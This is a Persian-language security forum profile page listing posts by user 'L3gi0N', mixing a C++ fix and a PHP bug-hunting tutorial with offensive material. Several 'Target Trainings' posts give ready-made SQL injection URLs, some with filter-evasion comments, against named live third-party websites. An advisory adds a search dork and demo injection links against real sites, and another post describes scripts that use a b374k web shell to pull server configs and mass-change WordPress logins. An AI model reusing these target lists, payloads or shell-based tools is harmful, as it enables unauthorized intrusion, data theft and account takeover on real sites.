رفتن به مطلب

با توجه به آماده سازی و تامین زیرساخت لازم جهت تبدیل انجمن به یک منبع آموزشی در حوزه امنیت و ارزیابی امنیت، لطفا فایل های خود را در انجمن پیوست نمایید. در غیر این صورت تاپیک شما حذف خواهد شد.

 

L3gi0N

ICG Programmer
  • تعداد ارسال ها

    61
  • تاریخ عضویت

  • آخرین بازدید

  • روز های برد

    1

آخرین بار برد L3gi0N در آذر 12 2020

L3gi0N یکی از رکورد داران بیشترین تعداد پسند مطالب است !

اعتبار در سایت

3 Neutral

5 دنبال کننده

درباره L3gi0N

  • تاریخ تولد ۰۰/۱۰/۲۰

Converted

  • Name
    L3gi0N
  • Main os
    Linux
  • Programming language
    خیر

آخرین بازدید کنندگان نمایه

بلوک آخرین بازدید کننده ها غیر فعال شده است و به دیگر کاربران نشان داده نمی شود.

  1. L3gi0N

    مشکل در نفوذ به سایت با باگ xss

    فکر میکنم منظورتون توکن CSRF باشه. تو کد جاواسکریپتی که تزریق میکنید میتونید با استفاده از تابع fetch کاری کنید که وقتی کد روی مرورگر تارگت اجرا میشه صفحه ای که اون توکن توش هست رو فراخوانی کنه و توکن رو استخراج کنه برای استفاده. چند سال پیش که Wordpress یه باگ XSS داشت با این تکنیک wp_nonce رو استخراج میکردن و ازش برای جعل درخواست استفاده میکردن.
  2. هک یه زمینه خیلی گسترده ایه. رمزنگاری, امنیت وب, امنیت شبکه و ... ولی خلاصش اینه: یه هکر خوب یه برنامه نویس خلاقه. برای مثال باگ SQLi رو در نظر بگیر: یه نفر میره یه جایی میخونه که اگه آخر یه آدرسی مثل http://site.com/item.php?id=10 علامت ' رو بزاری و یه ارور خاصی رو بهت بده اگر طبق یه سری مراحل خاصی پیش بری میتونی هکش کنی. این یه نفر میره همین کارارو انجام میده میزنه یه سایتی رو هم هک میکنه بدون این که بدونه اصلا چرا ' باعث میشه که اون ارور رو ببینه یا اون مراحل خاصی که طبقشون پیش میره دقیقا چیکار میکنن. یکی دیگه هم کسیه که این روش به ذهنش رسیده وقتی که دیده اگر دستوری که به دیتابیس فرستاده میشه SELECT * FROM items WHERE id='<INPUT>' باشه (منظور از INPUT ورودی کاربره) و روی INPUT هیچ فیلتری اعمال نشه میتونه با گذاشتن یه ' توی ورودیش از بین اون ' ها (هرچیزی که بین دوتا ' باشه به عنوان یه متن پردازش میشه و به عنوان دستور اجرا نمیشه) به اصطلاح فرار کنه و یه سری کد به دستوری که به دیتابیس میره اضافه کنه و باعث لو رفتن اطلاعات بشه. اگر منظورت از هکر شدن تبدیل شدن به یکی مثل اونیه که اول گفتم کلا بیخیال شو. ولی اگه واقعا میخوای درست حسابی یاد بگیری و با پایه و اساس پیش بری برنامه نویسی یاد بگیر, خلاق باش و همیشه اخبار مربوط به هک و امنیت رو دنبال کن. اگرم به چیزی برخورد کردی که نفهمیدی تحقیق کن. تحقیق کردن خیلی مهمه. اگر با تحقیق به جایی نرسیدی بعدش برو از بقیه سوال کن. برای زبان برنامه نویسی هم فرقی نمیکنه چی یاد میگیری هرچی بیشتر یاد بگیری هم بهتر. ولی برای شروع کار بهت پیشنهاد میکنم بری دنبال زبونایی که تو محیطی که میخوای توش بیشترین فعالیت رو کنی استفاده میشن.
  3. L3gi0N

    تاپیک مشکلات دوستان در C++

    سلام توی حلقه for بین دوتا متغیر باید از , به جای ; استفاده کنید و همچنین main باید int باشه نه void #include "stdafx.h" #include <conio.h> #include <iostream> using namespace std; int main() { float n,i,s=0,g; //clrscr(); cout << "Enter a number: "; cin >> n ; for (i=1,g=1;i<=n;i++,g*=-1) s += 1 / i*g; cout << s; cin.get(); cin.get(); return 0; }
  4. دوتا اسکریپت هست یکی با اسم backup.pl و یکی دیپه با اسم cng.pl به اولی ادرس فولدری که کانفیگ های سرور روش هست رو میدید به همراه ادرس یک شل b374k از سرور و یک فولدر توی pc خودتون بعد اسکریپت کار خودشو شروع میکنه و کانفیگ هارو براتون توی فولدر مشخص شده به صورت اسم [email protected] دانلود میکنه website ادرس سایتی هست که کانفیگ مربوط به اونه و username هم یوزر صاحب سایت در سرور. به دومی هم ادرس یک شل b374k از سرور مورد نظر به همراه ادرس فولدری که کانفیگ هارو توی pc خودتون دانلود کردید میدید بعد هم یک username و password بهش میدید و شروع میکنه به تغییر دادن username و password سایت های وردپرسی که کانفیگ هاشون رو دارید. download prog.zip
  5. https://cxsecurity.com/issue/WLB-2016040012 Datascan Information Technology SQL Injection Vulnerability Published Credit Risk 2016.04.01 Iran Cyber Security Group Medium CWE CVE Local Remote CWE-89 N/A No Yes Dork: intext:"Powered By Datascan Information Technology" ##################################################### # Exploit Title: Datascan Information Technology SQL Injection Vulnerability # Date: 2016-4-1 # Exploit Author: Iran Cyber Security Group # Discovered By: L3gi0N # Category : Web Application Bugs # Dork : intext:"Powered By Datascan Information Technology" # Home: iran-cyber.net ##################################################### # Vulnerable file: page_details.php # http://localhost:8080/page_details.php?menu_id=[sql Injection] ##################################################### # Demo: # http://biharmarwari.com/online/page_details.php?menu_id=13'+order+by+11+--+ # http://www.onlinercsm.in/mission_india/page_details.php?menu_id=13'+order+by+11+--+ # http://marwarishiksha.com/page_details.php?menu_id=13%27+order+by+17+--+ ##################################################### # iran-cyber.net # Tnx to: MOHAMAD-NOFOZI - root3r - sir.h4m1d - MoHaMaD-BlAcK - Mr.Turk - 0xDevil - 0x3a # MR.S4JJ4D ... 0day ... pi.hack ... Nazanin Wild #####################################################
  6. L3gi0N

    Target Trainings

    http://www.nuomega.com/displaynews.php?id=-8+union+select+1,2,3,version%28%29,5,6,7 http://www.windsorspitfires2.com/tour_of_champions/news.php?id=-5+union+select+1,2,version%28%29,4,5 http://www.kitayproductions.com/news.php?id=-60%27+union+select+1,2,3,4,5,6,7,version%28%29,9+--+
  7. L3gi0N

    Target Trainings

    http://www.everybodywinsdc.org/news.php?id=-251+union+select+1,2,3,version%28%29,5,6,7,8,9,10,11,12,13,14,15,16 http://www.pfedance.com/view_news.php?id=1+union+select+1,2,version%28%29,4,5,6,7,8 http://www.nspharmacists.org/news.php?id=-67%27+union+select+1,2,3,version%28%29,5+--+
  8. L3gi0N

    Target Trainings

    http://www.azura.co.za/product.php?id=-164+union+select+1,2,version%28%29,4,5,6,7 www.organicindia.com/overview_news.php?id=-88+union+select+1,version(),3,4,5,6,7 http://www.davisyoung.com/law-firm/news.php?id=-41%27+union+select+1,2,3,4,5,version%28%29,7,8,9+--+
  9. L3gi0N

    Target Trainings

    http://www.dvcanada.com/feature_product.php?id=-1113%20union%20select%201,version%28%29,3,4+--+ http://www.matthewschommer.com/gallery.php?id=-3%20union%20select%201,version%28%29,3,4,5,6,7,8,9,10,11,12+--+ http://www.exclusivelyauctions.com/gallery.php?id=-97%20union%20select%201,2,3,version%28%29,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36+--+
  10. L3gi0N

    اسکریپت امنیتی RIPS

    اسکریپت رو روی هاست سایتتون اپلود کنید و اسکن کنید بعد از اسکن حتما پاکش کنید اسکریپتش چنتا باگ امنیتی داره
  11. L3gi0N

    Target Trainings

    http://www.greenshop.org.tw/show_news.php?newsid=-376%27+union+select+1,version(),3,4,5+--+ http://www.drivingevent.com/show_news.php?NewsID=-204+union+select+1,2,version(),4 http://www.sanyourelay.ca/public/show_news.php?newsid=-1+union+select+1,version() http://culture.nipponclub.org/show_news.php?newsid=-227+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,version(),16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36
  12. L3gi0N

    Target Trainings

    http://www.vitacaremedical.com/product.php?id_category=18&id_subcategory=-51+/*!12345UnIOn*/+/*!12345SeLect*/+1,2,3,4,5,6,version%28%29,8,9,10,11+--+ http://www.premierbuildingny.com/gallery.php?id=-2+union+select+version%28%29+--+ http://www.micro-mechanics.com/product.php?id=-25%20/*!12345union*/%20/*!12345select*/%201,2,3,4,version%28%29,6,7,8,9,10,11,12,13,14,15,16+--+ http://www.schwinncyclery.com/brands/product.php?id=-59%27%20union%20select%201,2,3,4,version%28%29,6,7,8+--+
  13. قسمت سوم: خیلی از دوستان که برنامه نویسی PHP رو تازه شروع کردن نمیدونن که باگ ها چجوری و کجا به وجود میاد و وقتی طبق آموزش های قسمت های قبل پیش میرن فقط میفهمن که چه متغیر هایی قابل استفاده برای نفوذ هستن (فیلتر نمیشن) ولی نمیدونن که ایا اون متغیر ها درجایی که بشه ازش سو استفاده کرد به کار میرن یا نه و نمیدونن که چه بخش هایی قابل سو استفاده هستن. طبق تجربه ای که من داشتم شما هر آموزش باگ گیری رو نگاه کنید اومدن و چنتا function گذاشتن بغل هم و با یه کد و مثال خیلی ساده گفتن اگه اینجوری بود باگ داره و .... اما فقط این فانکشن ها اسیب پذیر نیستن در واقع باگ های اساسی در سه زمان پیش میاد: زمانی که از یک زبان داریم با یک سیستم یا زبانی که به زبان اصلی ربط نداره ارتباط برقرار میکنیم نمونه ی بارزش باگ sql injection هست که در واقع ما داریم با یک سیستم کاملا جدا که mysql هست و زبان اسکریپتینگ خودش (sql) رو داره ارتباط برقرار میکنیم. نمونه های دیگه: RCE - XSS زمانی که با فایل های دیگه سر و کار داره یا یک فانکشنی رو طبق درخواست اجرا میکنه. (هر زمانی که ما بتونیم فایلی که باهاش ارتباط برقرار میشه یا فانکشنی که اجرا میشه رو انتخاب کنیم و یا هنگام اپلود فایل هیچ بررسی روش انجام نشه احتمال وجود باگ هست) نمونه بارزش باگ LFD هست. نمونه های دیگه: Object Injection - RFI - RFU زمانی که هیچ کاری برای اطمینان از هویت افراد انجام نمیشه یا از درخواست های افراد اطمینان حاصل نمیشه نمونه بارزش باگ CSRF هست. بهتون پیشنهاد میکنم همیشه یک لیست از function های اسیب پذیر PHP داشته باشید ممکنه کمکتون کنه. مثل فانکشن unserialize که اگر بتونید محتویاتش رو کنترل کنید میتونید از حملات Object Injection استفاده کنید. (این مشکل فقط روی ورژن های قدیمی PHP موجوده)
  14. قسمت دوم: بعد از اینکه کار های قسمت قبلی رو انجام دادیم باید فایل هایی که اسمشون توی فایل inject.txt هست رو مورد بررسی قرار بدیم و دنبال متغیر هایی باشیم که ورودی کاربر رو دریافت می کنن بعد از اینکه اونهارو پیدا کردیم باید ببینیم که اونها چه تغییراتی روشون اعمال میشه (اگر تغییری روشون اعمال نشه که چه بهتر) و با درنظر داشتن اون تغییرات ببینیم که این متغیر ها کجا مورد استفاده قرار میگیرن اگر دیدید که توسط یک function یا class مورد استفاده قرار میگیرن و کد اونها درون این فایل نیست میتونید برنامه ی اموزش قبلی رو باز کنید و تیک Search codes رو بزنید بعد ادرس فولدری که فایل ها توشون قرار دارن رو بدید بهش و در کادری که جلوش نوشته Query میتونید اون function یا class رو جست و جو کنید و برنامه بعد از اسکن فایل ها اونهایی که متنی که به عنوان Query بهش دادید داشتن رو توی فایلی تو فولدر scan و با اسم result.txt میزاره و براتون بازش میکنه برای مثال اگر اسم function موردنظر test بود میتونیم با جست و جوی متن function test فایلی که کدهای اون function توش قرار دارن رو پیدا کنیم. اگر با وجود تغییر هایی که روی متغیرهایی که ورودی کاربر رو دریافت می کنن اعمال میشه باز هم بشه از اونها سو استفاده کرد میتونیم اون رو روی نسخه ای که در WAMP یا LAMP نصب کردیم تست کنیم. برای مثال کد زیر رو در نظر بگیرید: <?php $username = $_GET['user']; str_replace("(","",$username); $sqlquery = "SELECT * FROM users WHERE user='$username'"; mysql_query($sqlquery); ?> کد بالا پرانتز باز رو از ورودی کاربر حذف میکنه اما میبینید که بدون فیلتر کردنش برای جلوگیری از sql injection ازش تو mysql استفاده کرده پس به راحتی میتونیم حملات sql injection انجام بدیم و فیلتر کردن پرانتز باز عملا برای جلوگیری از sql injection بی استفادس و فقط یکم کار رو وقت گیر تر میکنه. اگر با تست روی WAMP یا LAMP موفق شدیم که خب یک باگ از اون cms یا plugin کشف کردیم اگر هم نه میتونیم با رجوع به کد ها مشکلات رو پیگیری کنیم و با اصلاح روش موفق بشیم اگر هم نشد میتونیم دنبال بقیه متغیر ها بریم.
  15. قسمت اول: اول از همه باید cms یا plugin رو که میخوایم ازش باگ بگیریم رو داشته باشیم بعد هم یک نسخه ازش رو روی LAMP برای Linux و یا WAMP برای Windows نصب کنیم. بعد هم یک نسخه ازش رو برای فیلتر کردن فایل های PHP توی یک فولدر دیگه بریزیم خب حالا با استفاده از برنامه ای که در اخر همین پست موجوده پوشه ای که فایل هارو توش ریختیم رو با کلیک بر روی دکمه Browse انتخاب میکنیم و بر روی Start Scanning می زنیم تا تمامی فایل هایی که به درد نیمخورن و PHP نیستن رو پاک کنه. بعد از اتمام اسکن این برنامه فایل هایی که با input های کاربر سر و کار دارن یا با دیتابیس ارتباط برقرار میکنن یا کامند اجرا می کنن رو شناسایی می کنه و ادرسشون رو توی فایل هایی با اسم های: inject.txt (فایل هایی که با input های کاربر سر و کار دارن) exec.txt (فایل هایی که کامند اجرا می کنن) sql.txt (فایل هایی که با دیتابیس ارتباط برقرار میکنن) توی فولدری با اسم scan ذخیره میکنه. طریقه استفاده از محتویات این فایل ها و برنامه ی قرار داده شده برای پیدا کردن باگ رو به صورت کامل در قسمت دوم توضیح میدم. I.C.S.G Exploiting Helper.zip

تاریخچه انجمن امنیتی ایران سایبر

شرکت امنیتی ایران سایبر با بکار گیری افراد متخصص در حوزه امنیت و ارائه راه کار در زمینه امنیت شبکه و امنیت بانک های اطلاعاتی در سال ۲۰۰۹ کار خود را آغاز نمود.

این شرکت با تعریفی جدید از ارائه خدمات و مشاوره در حوزه امنیت سازمان ها و مراکز، تست نفوذ، و برنامه نویسی در تعاملی سازنده با سازمان ها، مشتری مداری را سرلوحه کار خود قرار داده و آماده همکاری با شرکت ها و ارگان های مختلف می باشد.

رعایت قوانین

شرکت و انجمن امنیتی ایران سایبر با توجه به حضور مجاز و رسمی در محافل امنیتی و شرکت های ارزیابی امنیت ملزم به رعایت قوانین بوده و کاربران انجمن نیز ملزم به رعایت قوانین جمهوری اسلامی ایران میباشد.

×
×
  • اضافه کردن...